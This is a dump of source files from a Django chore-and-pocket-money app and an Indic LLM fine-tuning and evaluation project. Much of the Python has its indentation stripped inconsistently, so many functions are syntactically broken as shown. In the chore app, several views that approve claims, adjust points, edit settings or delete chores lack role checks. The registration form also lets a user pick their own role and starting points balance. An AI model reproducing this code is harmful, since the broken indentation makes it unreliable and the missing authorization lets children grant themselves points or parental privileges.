# Dataset columns: id, file_name, file_path, content, size, language, extension,
# total_lines, avg_line_length, max_line_length, alphanum_fraction, repo_name,
# repo_stars, repo_forks, repo_open_issues, repo_license, repo_extraction_date
# =============================================================================
# File: emmertex_chore_app/chore_app/views.py
# Repo: emmertex/chore_app (license: GPL-3.0)
# =============================================================================
import datetime
from django.contrib.auth import authenticate, get_user_model, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import UserCreationForm
from django.core.paginator import Paginator
from django.db.models import F, Q, Sum
from django.shortcuts import redirect, render
import chore_app.forms as forms
import chore_app.models as models
from chore_app.cron import nightly_action, has_run_today
UserModel = get_user_model()
class CustomUserCreationForm(UserCreationForm):
class Meta:
model = UserModel
fields = ('username', 'email', 'role', 'points_balance')
def register(request):
    if request.method == 'POST':
        form = CustomUserCreationForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('login')
    else:
        form = CustomUserCreationForm()
    return render(request, 'registration/register.html', {'form': form})
def profile(request):
    if request.user.is_authenticated:
        if request.user.role == 'Parent':
            return redirect('parent_profile')
        else:
            return redirect('child_profile')
    else:
        return redirect('login')
@login_required
def settings(request):
if request.user.role == 'Parent':
context = {
'settings': models.Settings.objects.all()
}
response = render(request, 'settings.html', context)
response['Cache-Control'] = 'no-cache, no-store, must-revalidate'
return response
else:
return redirect('child_profile')
@login_required
def edit_settings(request, pk):
try:
settings = models.Settings.objects.get(pk=pk)
if request.method == 'POST':
form = forms.EditSettingsForm(request.POST, instance=settings)
if form.is_valid():
form.save()
return redirect('settings')
        else:
            form = forms.EditSettingsForm(instance=settings)
        return render(request, 'edit_settings.html',
                      {'form': form, 'settings': settings})
    except Exception:
return redirect('parent_profile')
@login_required
def messages(request):
if request.user.role == 'Parent':
context = {
'messages': models.Text.objects.all()
}
response = render(request, 'messages.html', context)
response['Cache-Control'] = 'no-cache, no-store, must-revalidate'
return response
else:
return redirect('child_profile')
@login_required
def edit_text(request, pk):
try:
text = models.Text.objects.get(pk=pk)
if request.method == 'POST':
form = forms.EditTextForm(request.POST, instance=text)
if form.is_valid():
form.save()
return redirect('parent_profile')
else:
form = forms.EditTextForm(instance=text)
        return render(request, 'edit_text.html', {'form': form, 'text': text})
    except Exception:
return redirect('parent_profile')
@login_required
def parent_profile(request):
if request.user.role != 'Parent':
return redirect('child_profile')
point_logs = models.PointLog.objects.all().order_by('-date_recorded')
paginator = Paginator(point_logs, 20)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
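    # Daily leaderboard: sum today's chore-related point changes per user,
    # highest total first; rows with an empty chore name are excluded.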
chore_points = models.PointLog.objects.filter(
date_recorded__date=datetime.date.today()
).exclude(
chore=''
).values(
'user', 'user__username'
).annotate(
total_points=Sum('points_change')
).order_by('-total_points')
daily_task_ran = not has_run_today('chore_app.cron.nightly_action')
context = {
'available_chores': models.Chore.objects.filter(available=True),
'unavailable_chores': models.Chore.objects.filter(available=False),
'claimed_chores': models.ChoreClaim.objects.filter(approved=0).select_related('chore'),
'chore_points': chore_points,
'point_logs': page_obj,
'children': models.User.objects.filter(role='Child'),
'daily_task_ran': daily_task_ran
}
response = render(request, 'parent_profile.html', context)
response['Cache-Control'] = 'no-cache, no-store, must-revalidate'
return response
@login_required
def child_profile(request):
current_time = datetime.datetime.now().time()
bonus = current_time <= datetime.time(models.Settings.objects.get(
key='bonus_end_time').value) and current_time > datetime.time(5)
point_logs = models.PointLog.objects.filter(
user=request.user).order_by('-date_recorded')
paginator = Paginator(point_logs, 10)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
chore_points = models.PointLog.objects.filter(
date_recorded__date=datetime.date.today()
).exclude(
chore=''
).values(
'user', 'user__username'
).annotate(
total_points=Sum('points_change')
).order_by('-total_points')
chores = models.Chore.objects.filter(available=True)
claimed_chores = models.ChoreClaim.objects.filter(
user=request.user).select_related('chore')
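    # availableTime appears to act as an hour gate: a positive value unlocks
    # the chore at that hour, a negative value marks it missed once the current
    # hour passes abs(availableTime), and 0 means no restriction.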
filtered_chores = chores.exclude(
name__in=claimed_chores.values_list('choreName', flat=True)
).exclude(
(Q(availableTime__gte=0, availableTime__gt=current_time.hour) |
Q(availableTime__lt=0, availableTime__gt=-current_time.hour)) &
~Q(availableTime__exact=0)
)
future_chores = chores.exclude(
name__in=claimed_chores.values_list('choreName', flat=True)
).filter(
(Q(availableTime__gte=0, availableTime__gt=current_time.hour))
)
missed_chores = chores.exclude(
name__in=claimed_chores.values_list('choreName', flat=True)
).filter(
(Q(availableTime__lt=0, availableTime__gt=-current_time.hour))
)
settings = {setting.key: setting.value for setting in models.Settings.objects.all()}
context = {
        'minimum_points': settings['max_points'] / 2,
        'pocket_money': request.user.pocket_money / 100,
        'pocket_money_amount': settings['point_value'],
'bonus': bonus,
'points': request.user.points_balance,
'chores': filtered_chores,
'chore_points': chore_points,
'point_logs': page_obj, # Use the paginated page_obj instead of the original queryset
'claimed_chores': claimed_chores,
'future_chores': future_chores,
'missed_chores': missed_chores,
'max_points': settings['max_points'],
'min_points': settings['min_points'],
'leaderboard_awards': settings['leaderboard_awards'],
'incomplete_chores_penalty': settings['incomplete_chores_penalty'],
'daily_message': models.Text.objects.get(key='daily_message')
}
response = render(request, 'child_profile.html', context)
response['Cache-Control'] = 'no-cache, no-store, must-revalidate'
return response
@login_required
def create_chore(request):
if request.method == 'POST':
form = forms.ChoreForm(request.POST)
if form.is_valid():
form.save()
return redirect('parent_profile')
else:
form = forms.ChoreForm()
return render(request, 'create_chore.html', {'form': form})
@login_required
def edit_chore(request, pk):
try:
chore = models.Chore.objects.get(pk=pk)
if request.method == 'POST':
form = forms.EditChoreForm(request.POST, instance=chore)
if form.is_valid():
form.save()
return redirect('parent_profile')
else:
form = forms.EditChoreForm(instance=chore)
return render(request, 'edit_chore.html', {'form': form, 'chore': chore})
    except Exception:
return redirect('parent_profile')
@login_required
def toggle_availability(request, pk):
try:
chore = models.Chore.objects.get(pk=pk)
chore.available = not chore.available
chore.save()
    except Exception:
pass
return redirect('parent_profile')
@login_required
def convert_points_to_money(request, pk):
try:
user = models.User.objects.get(pk=pk)
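        # Exchange 100 points for pocket money; pocket_money appears to be
        # stored in hundredths, so the credit is 100 * point_value.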
if user.points_balance > models.Settings.objects.get(key='max_points').value / 2:
user.pocket_money += 100 * \
models.Settings.objects.get(key='point_value').value
user.points_balance -= 100
user.save()
models.PointLog.objects.create(user=user, points_change=-100, penalty=0,
reason='Conversion to Pocket Money', chore='', approver=user)
    except Exception:
pass
return redirect('child_profile')
@login_required
def delete_chore(request, pk):
try:
chore = models.Chore.objects.get(pk=pk)
chore.delete()
    except Exception:
pass
return redirect('parent_profile')
@login_required
def penalise_chore(request, pk):
try:
chore = models.Chore.objects.get(pk=pk)
chore.available = False
chore.save()
for child in models.User.objects.filter(role='Child'):
models.ChoreClaim.objects.create(
chore=chore, user=child, choreName=chore.name, points=(-chore.points), approved=(-chore.points), comment='Penalty for incomplete chore'
)
    except Exception:
pass
return redirect('parent_profile')
@login_required
def claim_chore(request, pk):
try:
current_time = datetime.datetime.now().time()
chore = models.Chore.objects.get(pk=pk)
if chore.available:
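            # Early-bird bonus window: between 05:00 and the configured
            # bonus_end_time hour, for chores that define an earlyBonus.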
if current_time <= datetime.time(models.Settings.objects.get(key='bonus_end_time').value) \
and current_time > datetime.time(5) \
and chore.earlyBonus:
addPoints = chore.points * \
((models.Settings.objects.get(key='bonus_percent').value + 100) / 100)
comment = 'Early Bonus of ' + \
str(chore.earlyBonus) + ' points: ' + chore.comment
else:
addPoints = chore.points
comment = chore.comment
models.ChoreClaim.objects.create(
chore=chore, user=request.user, choreName=chore.name, points=addPoints, comment=comment)
if not chore.persistent:
chore.available = False
chore.save()
    except Exception:
pass
return redirect('child_profile')
@login_required
def return_chore(request, pk):
try:
choreClaim = models.ChoreClaim.objects.get(pk=pk)
if choreClaim.approved == 0:
try:
chore = models.Chore.objects.get(pk=choreClaim.chore.pk)
chore.available = True
chore.save()
            except Exception:
pass
choreClaim.delete()
    except Exception:
pass
return redirect('child_profile')
@login_required
def approve_chore_claim(request, pk, penalty, auto=False):
try:
choreClaim = models.ChoreClaim.objects.get(pk=pk)
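        # Credit the claimed points minus a percentage penalty (0-100); the net
        # amount is also stored on the claim as its approved value.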
models.PointLog.objects.create(user=choreClaim.user, points_change=(choreClaim.points - (choreClaim.points * (
penalty / 100))), penalty=penalty, reason='Approved', chore=choreClaim.choreName, approver=request.user)
user = models.User.objects.get(pk=choreClaim.user.pk)
user.points_balance += (choreClaim.points -
(choreClaim.points * (penalty / 100)))
user.save()
choreClaim.approved = (choreClaim.points -
(choreClaim.points * (penalty / 100)))
choreClaim.save()
    except Exception:
pass
if not auto:
return redirect('parent_profile')
else:
return
@login_required
def reject_chore_claim(request, pk):
try:
choreClaim = models.ChoreClaim.objects.get(pk=pk)
try:
chore = models.Chore.objects.get(pk=choreClaim.chore.pk)
chore.available = True
chore.save()
        except Exception:
pass
models.PointLog.objects.create(user=choreClaim.user, points_change=0, penalty=100,
reason='Rejected', chore=choreClaim.choreName, approver=request.user)
choreClaim.delete()
    except Exception:
pass
return redirect('parent_profile')
@login_required
def point_adjustment(request, pk):
if request.method == 'POST':
form = forms.PointAdjustmentForm(request.POST)
if form.is_valid():
user = models.User.objects.get(pk=pk)
point_log = form.save(commit=False)
point_log.user = user
point_log.approver = request.user
point_log.save()
user.points_balance += form.cleaned_data['points_change']
user.save()
return redirect('parent_profile')
else:
form = forms.PointAdjustmentForm()
return render(request, 'point_adjustment.html', {'form': form})
@login_required
def pocket_money_adjustment(request, pk):
if request.method == 'POST':
form = forms.PocketMoneyAdjustmentForm(request.POST)
if form.is_valid():
user = models.User.objects.get(pk=pk)
user.pocket_money += form.cleaned_data['pocket_money']
user.save()
return redirect('parent_profile')
else:
form = forms.PocketMoneyAdjustmentForm()
return render(request, 'pocket_money_adjustment.html', {'form': form})
@login_required
def child_chore(request):
if request.method == 'POST':
form = forms.CustomChildChore(request.POST)
if form.is_valid():
chore_claim = form.save(commit=False)
chore_claim.user = request.user
chore_claim.save()
return redirect('child_profile')
else:
form = forms.CustomChildChore()
return render(request, 'child_chore.html', {'form': form})
@login_required
def daily_action(request):
nightly_action(approver=request.user)
return redirect('parent_profile')

# =============================================================================
# File: emmertex_chore_app/chore_app/templatetags/extra_filters.py
# Repo: emmertex/chore_app (license: GPL-3.0)
# =============================================================================
from django import template
register = template.Library()
@register.filter(name='halve')
def halve(value):
try:
return str(int(value / 2))
except (ValueError, TypeError):
return str(int(value))
@register.filter(name='fifth')
def fifth(value):
try:
return str(int(value / 5))
except (ValueError, TypeError):
return str(int(value))
@register.filter(name='abs_filter')
def abs_filter(value):
try:
return str(int(abs(value)))
except (ValueError, TypeError):
return str(int(value))
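
# A minimal usage sketch for these filters (the template snippet is a
# hypothetical example, not taken from the repo):
#
#   {% load extra_filters %}
#   {{ user.points_balance|halve }}    {# half the balance, as a string #}
#   {{ max_points|fifth }}             {# one fifth of the value #}
#   {{ points_change|abs_filter }}     {# absolute value #}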

# =============================================================================
# File: adithya-s-k_Indic-llm/setup.py
# Repo: adithya-s-k/Indic-llm (license: GPL-3.0)
# =============================================================================
import os
from setuptools import find_packages, setup
_PATH_ROOT = os.path.dirname(__file__)
with open(os.path.join(_PATH_ROOT, "README.md"), encoding="utf-8") as fo:
readme = fo.read()
setup(
name="indic_llm",
version="0.1.0",
description="Open source large language model implementation",
author="Adithya S Kolavi",
url="https://github.com/adithya-s-k/Indic-llm",
install_requires=[
"torch>=2.2.0",
],
packages=find_packages(),
long_description=readme,
long_description_content_type="text/markdown",
)

# =============================================================================
# File: adithya-s-k_Indic-llm/archives/finetuning/sft.py
# Repo: adithya-s-k/Indic-llm (license: GPL-3.0)
# =============================================================================
# Fine-Tune Llama2-7b on SE paired dataset
import os
from dataclasses import dataclass, field
from typing import Optional
import torch
from accelerate import Accelerator
from datasets import load_dataset
from peft import AutoPeftModelForCausalLM, LoraConfig
from tqdm import tqdm
from transformers import AutoModelForCausalLM, AutoTokenizer, BitsAndBytesConfig, HfArgumentParser, TrainingArguments
from trl import SFTTrainer
from trl.import_utils import is_npu_available, is_xpu_available
from trl.trainer import ConstantLengthDataset
@dataclass
class ScriptArguments:
model_name: Optional[str] = field(default="meta-llama/Llama-2-7b-hf", metadata={"help": "the model name"})
dataset_name: Optional[str] = field(default="lvwerra/stack-exchange-paired", metadata={"help": "the dataset name"})
subset: Optional[str] = field(default="data/finetune", metadata={"help": "the subset to use"})
split: Optional[str] = field(default="train", metadata={"help": "the split to use"})
size_valid_set: Optional[int] = field(default=4000, metadata={"help": "the size of the validation set"})
streaming: Optional[bool] = field(default=True, metadata={"help": "whether to stream the dataset"})
shuffle_buffer: Optional[int] = field(default=5000, metadata={"help": "the shuffle buffer size"})
seq_length: Optional[int] = field(default=1024, metadata={"help": "the sequence length"})
num_workers: Optional[int] = field(default=4, metadata={"help": "the number of workers"})
packing: Optional[bool] = field(default=True, metadata={"help": "whether to use packing for SFTTrainer"})
# LoraConfig
lora_alpha: Optional[float] = field(default=16, metadata={"help": "the lora alpha parameter"})
lora_dropout: Optional[float] = field(default=0.05, metadata={"help": "the lora dropout parameter"})
lora_r: Optional[int] = field(default=8, metadata={"help": "the lora r parameter"})
parser = HfArgumentParser((ScriptArguments, TrainingArguments))
script_args, training_args = parser.parse_args_into_dataclasses()
peft_config = LoraConfig(
r=script_args.lora_r,
lora_alpha=script_args.lora_alpha,
lora_dropout=script_args.lora_dropout,
target_modules=["q_proj", "v_proj"],
bias="none",
task_type="CAUSAL_LM",
)
if training_args.group_by_length and script_args.packing:
raise ValueError("Cannot use both packing and group by length")
# `gradient_checkpointing` was True by default until `1f3314`, but it's actually not used.
# Passing `gradient_checkpointing=True` here causes a `Variable._execution_engine.run_backward` error.
if training_args.gradient_checkpointing:
raise ValueError("gradient_checkpointing not supported")
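
# A sketch of how this script might be launched (values are illustrative; the
# TrainingArguments flags such as --output_dir come from HfArgumentParser):
#
#   accelerate launch sft.py \
#       --model_name meta-llama/Llama-2-7b-hf \
#       --dataset_name lvwerra/stack-exchange-paired \
#       --output_dir ./sft-llama2 \
#       --per_device_train_batch_size 4 \
#       --learning_rate 1e-4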
def chars_token_ratio(dataset, tokenizer, nb_examples=400):
"""
Estimate the average number of characters per token in the dataset.
"""
total_characters, total_tokens = 0, 0
for _, example in tqdm(zip(range(nb_examples), iter(dataset)), total=nb_examples):
text = prepare_sample_text(example)
total_characters += len(text)
if tokenizer.is_fast:
total_tokens += len(tokenizer(text).tokens())
else:
total_tokens += len(tokenizer.tokenize(text))
return total_characters / total_tokens
def print_trainable_parameters(model):
"""
Prints the number of trainable parameters in the model.
"""
trainable_params = 0
all_param = 0
for _, param in model.named_parameters():
all_param += param.numel()
if param.requires_grad:
trainable_params += param.numel()
print(
f"trainable params: {trainable_params} || all params: {all_param} || trainable%: {100 * trainable_params / all_param}"
)
def prepare_sample_text(example):
"""Prepare the text from a sample of the dataset."""
text = f"Question: {example['question']}\n\nAnswer: {example['response_j']}"
return text
def create_datasets(tokenizer, args):
dataset = load_dataset(
args.dataset_name,
data_dir=args.subset,
split=args.split,
use_auth_token=True,
num_proc=args.num_workers if not args.streaming else None,
streaming=args.streaming,
)
if args.streaming:
print("Loading the dataset in streaming mode")
valid_data = dataset.take(args.size_valid_set)
train_data = dataset.skip(args.size_valid_set)
train_data = train_data.shuffle(buffer_size=args.shuffle_buffer, seed=None)
else:
dataset = dataset.train_test_split(test_size=0.005, seed=None)
train_data = dataset["train"]
valid_data = dataset["test"]
print(f"Size of the train set: {len(train_data)}. Size of the validation set: {len(valid_data)}")
chars_per_token = chars_token_ratio(train_data, tokenizer)
print(f"The character to token ratio of the dataset is: {chars_per_token:.2f}")
train_dataset = ConstantLengthDataset(
tokenizer,
train_data,
formatting_func=prepare_sample_text,
infinite=True,
seq_length=args.seq_length,
chars_per_token=chars_per_token,
)
valid_dataset = ConstantLengthDataset(
tokenizer,
valid_data,
formatting_func=prepare_sample_text,
infinite=False,
seq_length=args.seq_length,
chars_per_token=chars_per_token,
)
return train_dataset, valid_dataset
bnb_config = BitsAndBytesConfig(
load_in_4bit=True,
bnb_4bit_quant_type="nf4",
bnb_4bit_compute_dtype=torch.bfloat16,
)
base_model = AutoModelForCausalLM.from_pretrained(
script_args.model_name,
quantization_config=bnb_config,
device_map={"": Accelerator().local_process_index},
trust_remote_code=True,
use_auth_token=True,
)
base_model.config.use_cache = False
tokenizer = AutoTokenizer.from_pretrained(script_args.model_name, trust_remote_code=True)
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = "right" # Fix weird overflow issue with fp16 training
train_dataset, eval_dataset = create_datasets(tokenizer, script_args)
trainer = SFTTrainer(
model=base_model,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
peft_config=peft_config,
packing=script_args.packing,
max_seq_length=None,
tokenizer=tokenizer,
args=training_args,
)
trainer.train()
trainer.save_model(training_args.output_dir)
output_dir = os.path.join(training_args.output_dir, "final_checkpoint")
trainer.model.save_pretrained(output_dir)
# Free memory for merging weights
del base_model
if is_xpu_available():
torch.xpu.empty_cache()
elif is_npu_available():
torch.npu.empty_cache()
else:
torch.cuda.empty_cache()
model = AutoPeftModelForCausalLM.from_pretrained(output_dir, device_map="auto", torch_dtype=torch.bfloat16)
model = model.merge_and_unload()
output_merged_dir = os.path.join(training_args.output_dir, "final_merged_checkpoint")
model.save_pretrained(output_merged_dir, safe_serialization=True)

# =============================================================================
# File: adithya-s-k_Indic-llm/archives/eval/template.py
# Repo: adithya-s-k/Indic-llm (license: GPL-3.0)
# =============================================================================
def create_prompt_with_tulu_chat_format(messages, bos="<s>", eos="</s>", add_bos=True):
formatted_text = ""
for message in messages:
if message["role"] == "system":
formatted_text += "<|system|>\n" + message["content"] + "\n"
elif message["role"] == "user":
formatted_text += "<|user|>\n" + message["content"] + "\n"
elif message["role"] == "assistant":
formatted_text += "<|assistant|>\n" + message["content"].strip() + eos + "\n"
else:
raise ValueError(
"Tulu chat template only supports 'system', 'user' and 'assistant' roles. Invalid role: {}.".format(
message["role"]
)
)
formatted_text += "<|assistant|>\n"
formatted_text = bos + formatted_text if add_bos else formatted_text
return formatted_text
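
# A minimal usage sketch (the message content is a hypothetical example):
#
#   >>> msgs = [{"role": "user", "content": "Plan a trip to Paris."}]
#   >>> create_prompt_with_tulu_chat_format(msgs)
#   '<s><|user|>\nPlan a trip to Paris.\n<|assistant|>\n'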
def create_prompt_with_llama2_chat_format(messages, bos="<s>", eos="</s>", add_bos=True):
"""
This function is adapted from the official llama2 chat completion script:
https://github.com/facebookresearch/llama/blob/7565eb6fee2175b2d4fe2cfb45067a61b35d7f5e/llama/generation.py#L274
"""
B_SYS, E_SYS = "<<SYS>>\n", "\n<</SYS>>\n\n"
B_INST, E_INST = "[INST]", "[/INST]"
formatted_text = ""
# If you want to include system prompt, see this discussion for the template: https://huggingface.co/TheBloke/Llama-2-7B-Chat-GGML/discussions/4
# However, see here that removing the system prompt actually reduce the false refusal rates: https://github.com/facebookresearch/llama/blob/main/UPDATES.md?utm_source=twitter&utm_medium=organic_social&utm_campaign=llama2&utm_content=text#observed-issue
if messages[0]["role"] == "system":
assert (
len(messages) >= 2 and messages[1]["role"] == "user"
), "LLaMa2 chat cannot start with a single system message."
messages = [
{
"role": "user",
"content": B_SYS + messages[0]["content"] + E_SYS + messages[1]["content"],
}
] + messages[2:]
for message in messages:
if message["role"] == "user":
formatted_text += bos + f"{B_INST} {(message['content']).strip()} {E_INST}"
elif message["role"] == "assistant":
formatted_text += f" {(message['content'])} " + eos
else:
raise ValueError(
"Llama2 chat template only supports 'system', 'user' and 'assistant' roles. Invalid role: {}.".format(
message["role"]
)
)
# The llama2 chat template by default has a bos token at the start of each user message.
# The next line removes the bos token if add_bos is False.
formatted_text = formatted_text[len(bos) :] if not add_bos else formatted_text
    return formatted_text

# =============================================================================
# File: adithya-s-k_Indic-llm/archives/eval/eval.py
# Repo: adithya-s-k/Indic-llm (license: GPL-3.0)
# =============================================================================
import argparse
import os
import random
import torch
import numpy as np
import pandas as pd
import time
import json
from tqdm import tqdm
import time
import evaluate
from datasets import load_dataset
from eval.utils import (
generate_completions,
load_hf_lm_and_tokenizer,
dynamic_import_function,
)
from bleurt import score
lang_map = {
"asm_Beng": "Assamese",
"ben_Beng": "Bengali",
"brx_Deva": "Bodo",
"doi_Deva": "Dogri",
"eng_Latn": "English",
"guj_Gujr": "Gujarati",
"gom_Deva": "Konkani",
"hin_Deva": "Hindi",
"kan_Knda": "Kannada",
"kas_Arab": "Kashmiri",
"mai_Deva": "Maithili",
"mal_Mlym": "Malayalam",
"mar_Deva": "Marathi",
"mni_Mtei": "Manipuri",
"npi_Deva": "Nepali",
"ory_Orya": "Odia",
"pan_Guru": "Punjabi",
"san_Deva": "Sanskrit",
"sat_Olck": "Santali",
"snd_Deva": "Sindhi",
"tam_Taml": "Tamil",
"tel_Telu": "Telugu",
"urd_Arab": "Urdu",
}
def format_example(src_text, src_lang, tgt_lang, tgt_text=None):
prompt = f"{lang_map[src_lang]}: {src_text}"
prompt += f"\n{lang_map[tgt_lang]}:"
if tgt_text is not None:
prompt += f" {tgt_text}\n\n"
return prompt
def gen_prompt(dev_data, src_lang, tgt_lang, k=-1):
prompt = f"Translate the following sentence(s) from {lang_map[src_lang]} into {lang_map[tgt_lang]}.\n\n"
if k > 0:
exemplars = dev_data.select(range(k))
for example in exemplars:
prompt += format_example(
src_text=example[f"sentence_{src_lang}"],
src_lang=src_lang,
tgt_lang=tgt_lang,
tgt_text=example[f"sentence_{tgt_lang}"],
)
return prompt
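
# gen_prompt plus the trailing format_example call assemble few-shot prompts of
# this shape (contents illustrative):
#
#   Translate the following sentence(s) from English into Hindi.
#
#   English: <exemplar source sentence>
#   Hindi: <exemplar target sentence>
#
#   English: <test source sentence>
#   Hindi: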
def main(args):
random.seed(args.seed)
if args.model_name_or_path:
print("Loading model and tokenizer...")
model, tokenizer = load_hf_lm_and_tokenizer(
model_name_or_path=args.model_name_or_path,
tokenizer_name_or_path=args.tokenizer_name_or_path,
load_in_8bit=args.load_in_8bit,
device_map="balanced_low_0" if torch.cuda.device_count() > 1 else "auto",
gptq_model=args.gptq,
)
if not os.path.exists(args.save_dir):
os.makedirs(args.save_dir)
chat_formatting_function = dynamic_import_function(args.chat_formatting_function) if args.use_chat_format else None
dataset = load_dataset(args.dataset, f"{args.src_lang}-{args.tgt_lang}")
dataset = dataset.map(
lambda x: {
f"sentence_{args.src_lang}": x[f"sentence_{args.src_lang}"].strip(),
f"sentence_{args.tgt_lang}": x[f"sentence_{args.tgt_lang}"].strip(),
}
)
test_data = dataset["gen"] if args.dataset == "ai4bharat/IN22-Gen" else dataset["conv"]
# test_data = test_data.select(range(50))
prompts = []
for i, example in enumerate(test_data):
dev_data = test_data.filter(
lambda x: x[f"sentence_{args.src_lang}"] != example[f"sentence_{args.src_lang}"]
).shuffle(args.seed)
k = args.ntrain
prompt_end = format_example(
src_text=example[f"sentence_{args.src_lang}"], src_lang=args.src_lang, tgt_lang=args.tgt_lang
)
train_prompt = gen_prompt(dev_data, args.src_lang, args.tgt_lang, k)
prompt = train_prompt + prompt_end
if args.use_chat_format:
messages = [{"role": "user", "content": prompt}]
prompt = chat_formatting_function(messages, add_bos=False)
if prompt[-1] in ["\n", " "]:
prompt += f"The {lang_map[args.tgt_lang]} translation is: "
else:
prompt += f" The {lang_map[args.tgt_lang]} translation is: "
tokenized_prompt = tokenizer(prompt, truncation=False, add_special_tokens=False).input_ids
# make sure every prompt is less than 2048 tokens
while len(tokenized_prompt) > 2048:
k -= 1
            train_prompt = gen_prompt(dev_data, args.src_lang, args.tgt_lang, k)
prompt = train_prompt + prompt_end
if args.use_chat_format:
messages = [{"role": "user", "content": prompt}]
prompt = chat_formatting_function(messages, add_bos=False)
if prompt[-1] in ["\n", " "]:
prompt += f"The {lang_map[args.tgt_lang]} translation is: "
else:
prompt += f" The {lang_map[args.tgt_lang]} translation is: "
tokenized_prompt = tokenizer(prompt, truncation=False, add_special_tokens=False).input_ids
prompts.append(prompt)
outputs = generate_completions(
model=model,
tokenizer=tokenizer,
prompts=prompts,
max_new_tokens=256,
batch_size=args.eval_batch_size,
stop_id_sequences=None,
)
# remove unnecessary space
outputs = [output.strip().split("\n")[0] for output in outputs]
with open(os.path.join(args.save_dir, f"in22_{args.src_lang}_{args.tgt_lang}_predictions.jsonl"), "w") as fout:
for example, output in zip(test_data, outputs):
example["prediction_text"] = output
fout.write(json.dumps(example) + "\n")
# flush all the GPU memory
del model
torch.cuda.empty_cache()
import gc
gc.collect()
print("Calculating bleu, chrf, chrf++, bleurt ...")
sacrebleu = evaluate.load("sacrebleu")
chrf = evaluate.load("chrf")
bleurt = score.BleurtScorer(args.bleurt_model_name_or_path)
    predictions = list(outputs)
references = [[example[f"sentence_{args.tgt_lang}"]] for example in test_data]
metrics = {
"bleu": sacrebleu.compute(predictions=predictions, references=references)["score"],
"chrf": chrf.compute(predictions=predictions, references=references)["score"],
"chrf2": chrf.compute(predictions=predictions, references=references, word_order=2)["score"],
"bleurt": np.mean(
bleurt.score(candidates=predictions, references=[ref for sublist in references for ref in sublist])
),
}
for k, v in metrics.items():
print(f"{k}: {v:.4f}")
# save results
with open(os.path.join(args.save_dir, "metrics.json"), "w") as fout:
json.dump(metrics, fout, indent=4)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--ntrain", type=int, default=5, help="number of examples to use for few-shot evaluation.")
parser.add_argument("--seed", type=int, default=42)
parser.add_argument(
"--dataset", type=str, default="ai4bharat/IN22-Gen", choices=["ai4bharat/IN22-Gen", "ai4bharat/IN22-Conv"]
)
parser.add_argument(
"--src_lang",
type=str,
default="eng_Latn",
choices=list(lang_map.keys()),
)
parser.add_argument(
"--tgt_lang",
type=str,
default="hin_Deva",
choices=list(lang_map.keys()),
)
parser.add_argument("--save_dir", type=str, default="results/in22-gen/llama-7B/")
parser.add_argument(
"--bleurt_model_name_or_path",
type=str,
default="/data/jaygala/bleurt/BLEURT-20",
help="bleurt model to load for evaluation.",
)
parser.add_argument(
"--model_name_or_path",
type=str,
default=None,
help="if specified, we will load the model to generate the predictions.",
)
parser.add_argument(
"--tokenizer_name_or_path",
type=str,
default=None,
help="if specified, we will load the tokenizer from here.",
)
parser.add_argument("--eval_batch_size", type=int, default=1, help="batch size for evaluation.")
parser.add_argument(
"--load_in_8bit",
action="store_true",
help="load model in 8bit mode, which will reduce memory and speed up inference.",
)
parser.add_argument(
"--gptq",
action="store_true",
help="If given, we're evaluating a 4-bit quantized GPTQ model.",
)
parser.add_argument(
"--use_chat_format",
action="store_true",
help="If given, we will use the chat format for the prompts.",
)
parser.add_argument(
"--chat_formatting_function",
type=str,
default="eval.templates.create_prompt_with_tulu_chat_format",
help="The function to use to create the chat format. This function will be dynamically imported. Please see examples in `eval/templates.py`.",
)
args = parser.parse_args()
    main(args)

# =============================================================================
# File: adithya-s-k_Indic-llm/archives/eval/predict.py
# Repo: adithya-s-k/Indic-llm (license: GPL-3.0)
# =============================================================================
"""
This script is used to get models' predictions on a set of prompts (put in files with *.jsonl format,
with the prompt in a `prompt` field or the conversation history in a `messages` field).
For example, to get predictions on a set of prompts, you should put them in a file with the following format:
{"id": <uniq_id>, "prompt": "Plan a trip to Paris."}
...
Or you can use the messages format:
{"id": <uniq_id>, "messages": [{"role": "user", "content": "Plan a trip to Paris."}]}
...
Then you can run this script with the following command:
python eval/predict.py \
--model_name_or_path <huggingface_model_name_or_path> \
--input_files <input_file_1> <input_file_2> ... \
--output_file <output_file> \
--batch_size <batch_size> \
--use_vllm
"""
import argparse
import json
import os
import vllm
import torch
from eval.utils import (
generate_completions,
load_hf_lm_and_tokenizer,
query_openai_chat_model,
dynamic_import_function,
)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--model_name_or_path", type=str, help="Huggingface model name or path.")
parser.add_argument(
"--tokenizer_name_or_path", type=str, help="Huggingface tokenizer name or path."
)
parser.add_argument(
"--use_slow_tokenizer",
action="store_true",
help="If given, we will use the slow tokenizer.",
)
parser.add_argument(
"--openai_engine",
type=str,
help="OpenAI engine name. This should be exclusive with `model_name_or_path`.",
)
parser.add_argument(
"--input_files",
type=str,
nargs="+",
help="Input .jsonl files, with each line containing `id` and `prompt` or `messages`.",
)
parser.add_argument(
"--output_file",
type=str,
default="output/model_outputs.jsonl",
help="Output .jsonl file, with each line containing `id`, `prompt` or `messages`, and `output`.",
)
parser.add_argument("--batch_size", type=int, default=1, help="batch size for prediction.")
parser.add_argument(
"--load_in_8bit",
action="store_true",
help="load model in 8bit mode, which will reduce memory and speed up inference.",
)
parser.add_argument(
"--load_in_float16",
action="store_true",
help="By default, huggingface model will be loaded in the torch.dtype specificed in its model_config file."
"If specified, the model dtype will be converted to float16 using `model.half()`.",
)
parser.add_argument(
"--gptq",
action="store_true",
help="If given, we're evaluating a 4-bit quantized GPTQ model.",
)
parser.add_argument(
"--use_vllm",
action="store_true",
help="If given, we will use the vllm library, which will likely increase the inference throughput.",
)
parser.add_argument(
"--use_chat_format",
action="store_true",
help="If given, we will use the chat format for the prompts.",
)
parser.add_argument(
"--chat_formatting_function",
type=str,
default="eval.templates.create_prompt_with_tulu_chat_format",
help="The function to use to create the chat format. This function will be dynamically imported. Please see examples in `eval/templates.py`.",
)
parser.add_argument(
"--max_new_tokens", type=int, default=2048, help="maximum number of new tokens to generate."
)
parser.add_argument(
"--do_sample",
action="store_true",
help="whether to use sampling ; use greedy decoding otherwise.",
)
parser.add_argument("--temperature", type=float, default=1.0, help="temperature for sampling.")
parser.add_argument("--top_p", type=float, default=1.0, help="top_p for sampling.")
args = parser.parse_args()
